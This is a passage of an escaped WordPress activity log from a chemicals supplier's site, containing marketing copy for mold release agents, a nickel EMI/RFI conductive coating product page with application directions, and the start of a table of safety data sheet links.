Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F. \\u00a0These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining. \\u00a0Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective\\u00a0with injection molding operations.<\\/p>\\n<p>Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives. \\u00a0Miller-Stephenson\'s <strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/ptfe-release-agents\\/\\">MS-122AV and MS-122SE<\\/a><\\/strong> are formulations which increase the durability and cost-effectiveness even further by\\u00a0addition of proprietary surface activation chemistry.<\\/p>\\n<p><strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/semi-permanent-release-agents\\/\\">Thermoset polysiloxanes<\\/a>\\u00a0(ReleaSys)<\\/strong><\\/p>\\n<p>[caption id=\\"attachment_1561\\" align=\\"alignleft\\" width=\\"272\\"]<img class=\\"wp-image-1561\\" src=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/ReleaSys-polysiloxane-800x530.jpg\\" alt=\\"releasys-polysiloxane\\" width=\\"272\\" height=\\"180\\" \\/> <strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/mold-release-agents\\/semi-permanent-release-agents\\/\\">ReleaSys<\\/a><\\/strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[\\/caption]<\\/p>\\n<p>Thermoset polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface. \\u00a0These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application. \\u00a0Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.\\u00a0 Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations. \\u00a0Over application, however, may result in transfer, so Miller-Stephenson\\u00a0generally recommends training in the product\'s use by one of our technical staff. \\u00a0 Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.<\\/p>\\n<p>Miller-Stephenson\'s new <strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/semi-permanent-release-agents\\/\\">ReleaSys product<\\/a><\\/strong> line offers the most advanced semi-permanent thermoset mold release agents\\u00a0available. \\u00a0ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates. \\u00a0ReleaSys should not be used to mold any silicone or fluorosilicone based products.\\u00a0 Application can be performed via aerosolization or brushing\\/wiping and formulations come as either solvent or water-based. \\u00a0ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.<\\/p>\\n<p>Miller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.<\\/p>\\n[ux_product_categories ids=\\"21,16,20\\" number=\\"10\\"]\\n\\n<p>To learn more about our mold release agents please <strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/\\">click here.<\\/a><\\/strong><\\/p>\\n<h3>Technical or Application Support:<\\/h3>\\n<ul>\\n<li><a href=\\"https:\\/\\/www.miller-stephenson.com\\/mold-release-application-guide\\/\\"><strong>For any questions about proper application of our mold release products please\\u00a0view our article which discusses this process<\\/strong><\\/a><\\/li>\\n<li><strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/tech-support\\/\\">If you require any further technical or application support please contact our technical staff<\\/a><\\/strong><\\/li>\\n<li><strong><a href=\\"https:\\/\\/en.wikipedia.org\\/wiki\\/Release_agent\\">Understanding Release Agents<\\/a><\\/strong><\\/li>\\n<\\/ul>","post_title":"Mold Release Agents: Which is right for you?","post_excerpt":"","post_status":"publish","comment_status":"closed","ping_status":"closed","post_password":"","post_name":"mold-release-agent","to_ping":"","pinged":"","post_modified":"2017-01-16 20:29:58","post_modified_gmt":"2017-01-16 20:29:58","post_content_filtered":"","post_parent":0,"guid":"https:\\/\\/132.148.10.86\\/wordpress\\/?p=1525","menu_order":0,"post_type":"post","post_mime_type":"","comment_count":"0","filter":"raw"}],"function":"on_all_status_transitions"}},{"date":"13-01-2017 @ 16:58:37","via":{"args":["publish","publish",{"ID":1722,"post_author":"2","post_date":"2016-09-16 17:42:46","post_date_gmt":"2016-09-16 17:42:46","post_content":"Miller-Stephenson\'s Nickel Conductive Coatings offers superior protection and shielding in a fast drying and curing formulation. These Nickel Conductive Coatings allow the greater use of plastic enclosures\\/housings in manufacturing digital electronic devices has increased the need for reliable EMI\\/RFI coating solutions. A range of compounds have been developed that offer different conductive fillers to provide numerous resistance and attenuation levels. These systems can be applied by brushing and conventional spray techniques. Benefits of Miller-Stephenson Conductive Coating is the following:\\r\\n<ul>\\r\\n \\t<li>Protect electronic devices from electromagnetic pulses<\\/li>\\r\\n \\t<li>Superior shielding performance<\\/li>\\r\\n \\t<li>Minimal tack free time<\\/li>\\r\\n \\t<li>Cost effective alternative to other shielding methods<\\/li>\\r\\n \\t<li>Provide uniform thickness<\\/li>\\r\\n \\t<li>Anti-static<\\/li>\\r\\n \\t<li>Exceptional point to point resistivity<\\/li>\\r\\n \\t<li>For high and low volume applications<\\/li>\\r\\n<\\/ul>\\r\\nAn excellent way to limit EMI\\/RFI emissions is with a Miller-Stephenson\'s Nickel Conductive Coatings. MS-478G\\u00a0is a black coating, which may be applied in a 2 mil layer to absorb EMI\\/RFI over a broad frequency range. MS-478G is\\u00a0general purpose shielding spray for use on plastic electronics enclosures. Consists of a tough, durable acrylic base pigmented with high quality nickel flakes.\\u00a0This coating can be used effectively with Acrylic, Polycarbonate, ABS, Polystyrene, PVC and other plastics.\\r\\n\\r\\nRFI Nickel Conductive Coating can be applied by dipping, brushing and\\/or spraying. For best results when spraying, maintain pressure between 20-30 psi; adjust nozzle for acceptable spray pattern. Several light coats (2-3) applied from a distance of 10-12 inches will provide a 1.5-2.0 mil coating. Allow each coating to dry for 30 minutes before applying another coat. Do not dilute or contaminate with water.\\r\\n\\r\\nApplication for Miller-Stephenson\'s Conductive Coating include pad printing, screen-printing, spraying, dipping and syringe dispensing. Products can be applied to flexible or rigid substrates and can be printed on uneven or contoured surfaces. They feature good adhesion to a variety of substrates including Kapton, Mylar, glass and ceramics.\\r\\n\\r\\nAgitate material before and during use to prevent settling of the active ingredients. Apply to a clean, dry surface in a well-ventilated area at temperatures between 70-85\\u00baF.\\r\\n\\r\\n&nbsp;","post_title":"RFI \\/ EMI Nickel Conductive Coating (MS-485G \\/ MS-487G)","post_excerpt":"A nonflammable conductive coating that shields RFI \\/ EMI emissions over a broad range of frequencies. Coating is dry and functional within minutes of application. Recommended for application on plastic housings, enclosures, and resins. This coating can be used effectively with acrylic, polycarbonate, ABS, polystyrene, PVC and other plastics. 100% non-flammable and contains no ODC (ozone depleting chemicals).","post_status":"publish","comment_status":"open","ping_status":"closed","post_password":"","post_name":"conductive-coating","to_ping":"","pinged":"","post_modified":"2017-01-13 16:58:36","post_modified_gmt":"2017-01-13 16:58:36","post_content_filtered":"","post_parent":0,"guid":"https:\\/\\/132.148.10.86\\/wordpress\\/?post_type=product&#038;p=1722","menu_order":0,"post_type":"product","post_mime_type":"","comment_count":"0","filter":"raw"}],"function":"on_all_status_transitions"}},{"date":"12-01-2017 @ 14:39:17","via":{"args":["publish","publish",{"ID":1722,"post_author":"2","post_date":"2016-09-16 17:42:46","post_date_gmt":"2016-09-16 17:42:46","post_content":"Miller-Stephenson\'s Nickel Conductive Coatings offers superior protection and shielding in a fast drying and curing formulation. These Nickel Conductive Coatings allow the greater use of plastic enclosures\\/housings in manufacturing digital electronic devices has increased the need for reliable EMI\\/RFI coating solutions. A range of compounds have been developed that offer different conductive fillers to provide numerous resistance and attenuation levels. These systems can be applied by brushing and conventional spray techniques. Benefits of Miller-Stephenson Conductive Coating is the following:\\r\\n<ul>\\r\\n \\t<li>Protect electronic devices from electromagnetic pulses<\\/li>\\r\\n \\t<li>Superior shielding performance<\\/li>\\r\\n \\t<li>Minimal tack free time<\\/li>\\r\\n \\t<li>Cost effective alternative to other shielding methods<\\/li>\\r\\n \\t<li>Provide uniform thickness<\\/li>\\r\\n \\t<li>Anti-static<\\/li>\\r\\n \\t<li>Exceptional point to point resistivity<\\/li>\\r\\n \\t<li>For high and low volume applications<\\/li>\\r\\n<\\/ul>\\r\\nAn excellent way to limit EMI\\/RFI emissions is with a Miller-Stephenson\'s Nickel Conductive Coatings. MS-478G\\u00a0is a black coating, which may be applied in a 2 mil layer to absorb EMI\\/RFI over a broad frequency range. MS-478G is\\u00a0general purpose shielding spray for use on plastic electronics enclosures. Consists of a tough, durable acrylic base pigmented with high quality nickel flakes.\\u00a0This coating can be used effectively with Acrylic, Polycarbonate, ABS, Polystyrene, PVC and other plastics.\\r\\n\\r\\nRFI Nickel Conductive Coating can be applied by dipping, brushing and\\/or spraying. For best results when spraying, maintain pressure between 20-30 psi; adjust nozzle for acceptable spray pattern. Several light coats (2-3) applied from a distance of 10-12 inches will provide a 1.5-2.0 mil coating. Allow each coating to dry for 30 minutes before applying another coat. Do not dilute or contaminate with water.\\r\\n\\r\\nApplication for Miller-Stephenson\'s Conductive Coating include pad printing, screen-printing, spraying, dipping and syringe dispensing. Products can be applied to flexible or rigid substrates and can be printed on uneven or contoured surfaces. They feature good adhesion to a variety of substrates including Kapton, Mylar, glass and ceramics.\\r\\n\\r\\nAgitate material before and during use to prevent settling of the active ingredients. Apply to a clean, dry surface in a well-ventilated area at temperatures between 70-85\\u00baF.\\r\\n\\r\\n&nbsp;","post_title":"RFI \\/ EMI Nickel Conductive Coating MS-487G","post_excerpt":"A nonflammable conductive coating that shields RFI \\/ EMI emissions over a broad range of frequencies. Coating is dry and functional within minutes of application. Recommended for application on plastic housings, enclosures, and resins. This coating can be used effectively with acrylic, polycarbonate, ABS, polystyrene, PVC and other plastics. 100% non-flammable and contains no ODC (ozone depleting chemicals).","post_status":"publish","comment_status":"open","ping_status":"closed","post_password":"","post_name":"conductive-coating","to_ping":"","pinged":"","post_modified":"2017-01-12 14:39:16","post_modified_gmt":"2017-01-12 14:39:16","post_content_filtered":"","post_parent":0,"guid":"https:\\/\\/132.148.10.86\\/wordpress\\/?post_type=product&#038;p=1722","menu_order":0,"post_type":"product","post_mime_type":"","comment_count":"0","filter":"raw"}],"function":"on_all_status_transitions"}},{"date":"10-01-2017 @ 20:23:31","via":{"args":["publish","publish",{"ID":1842,"post_author":"2","post_date":"2016-09-20 13:40:27","post_date_gmt":"2016-09-20 13:40:27","post_content":"<h1>Miller-Stephenson SDS database.<\\/h1>\\r\\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-736-5216 (8-4 E.T.)\\r\\n<table width=\\"1119\\">\\r\\n<tbody>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\" width=\\"219\\"><strong>Aerosol<\\/strong><\\/td>\\r\\n<td style=\\"text-align: center;\\" width=\\"180\\"><strong>Liquid<\\/strong><\\/td>\\r\\n<td style=\\"text-align: center;\\" width=\\"180\\"><strong>Release Agents<\\/strong><\\/td>\\r\\n<td style=\\"text-align: center;\\" width=\\"180\\"><strong>Conformal Coatings<\\/strong><\\/td>\\r\\n<td style=\\"text-align: center;\\" width=\\"180\\"><strong>Krytox<\\/strong><\\/td>\\r\\n<td style=\\"text-align: center;\\" width=\\"180\\"><strong>Epoxy<\\/strong><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/124H.pdf\\">MS-124H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/111.pdf\\">MS-111<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122AD.pdf\\">MS-122AD<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/452N.pdf\\">MS-452N<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AGL683.pdf\\">AGL 683<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/900.pdf\\">MS-900<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/222L.pdf\\">MS-222L<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/114C.pdf\\">MS-114C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122ADRED.pdf\\">MS-122AD RED<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/460H.pdf\\">MS-460H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AT.pdf\\">AT<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/905A.pdf\\">MS-905 Part A<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/222N.pdf\\">MS-222N<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/115.pdf\\">MS-115<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122ADL.pdf\\">MS-122ADL<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/462H.pdf\\">MS-462H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/ATA.pdf\\">ATA<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/905B.pdf\\">MS-905 Part B<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/222N.pdf\\">MS-222T<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/182SD.pdf\\">MS-182SD<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122AV.pdf\\">MS-122AV<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/465C.pdf\\">MS-465C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AUT2A45.pdf\\">AUT 2A45<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/907A.pdf\\">MS-907 Part A<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/222N.pdf\\">MS-222F<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/126H.pdf\\">MS-126H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122E.pdf\\">MS-122E<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/467C.pdf\\">MS-467C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AUT523.pdf\\">AUT 523<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/907B.pdf\\">MS-907 Part B<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/242L.pdf\\">MS-242L<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/126HUV.pdf\\">MS-126HUV<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122ERED.pdf\\">MS-122E RED<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/470C-16.pdf\\">MS-470C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AUT1045.pdf\\">AUT 1045<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/908A.pdf\\">MS-908 Part A<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/242NAS.pdf\\">MS-242L-AS<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/383A.pdf\\">MS-383A<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122SE.pdf\\">MS-122SE<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/472S-16.pdf\\">MS-472S<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AUT2045.pdf\\">AUT 2045<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/908B.pdf\\">MS-908 Part B<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/242N.pdf\\">MS-242N<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/383H.pdf\\">MS-383H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122SD.pdf\\">MS-122SD<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/470S-16.pdf\\">MS-470S<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/AUT2245.pdf\\">AUT 2245<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/910A.pdf\\">MS-910 Part A<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/242NAS.pdf\\">MS-242N-AS<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/383HUV.pdf\\">MS-383HUV<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/122XD.pdf\\">MS-122XD<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/472S.pdf\\">MS-472S<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/143.pdf\\">143 SERIES<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/910B.pdf\\">MS-910 Part B<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381H.pdf\\">MS-381H<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/252.pdf\\">MS-252<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/132FE.pdf\\">MS-132FE<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/475C.pdf\\">MS-475C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/GPL10X.pdf\\">GPL 10X SERIES<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/heloxy48.pdf\\">HELOXY 48<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381H.pdf\\">MS-381HM<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/257.pdf\\">MS-257<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/136W.pdf\\">MS-136W<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/477C.pdf\\">MS-477C<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/GPL246.pdf\\">GPL 246<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/heloxy61.pdf\\">HELOXY 61<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381HUV.pdf\\">MS-381HUV<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/262.pdf\\">MS-262<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/143AX.pdf\\">MS-143AX<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/G0831B.pdf\\">G0831B<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/GPL255.pdf\\">GPL 255<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/heloxy62.pdf\\">HELOXY 62<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381HUV.pdf\\">MS-381HMUV<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/282.pdf\\">MS-282<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/143E-16.pdf\\">MS-143E<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/Y0110A.pdf\\">Y0110A<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/157FS.pdf\\">157FS<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/heloxy67.pdf\\">HELOXY 67<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381HC.pdf\\">MS-381HC<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/532.pdf\\">MS-532<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/143E1.pdf\\">MS-143E-1<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\">\\u00a0<a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/487G-16.pdf\\">MS-487G<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/GPL20X.pdf\\">GPL 20X SERIES<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/heloxy68.pdf\\">HELOXY 68<\\/a><\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/381HC.pdf\\">MS-381HCM<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/539.pdf\\">MS-539<\\/a><\\/td>\\r\\n<td style=\\"text-align: center;\\"><a href=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/sds\\/143E2.pdf\\">MS-143E-2<\\/a><\\/td>\\r\\n<td style=\\"text-align: 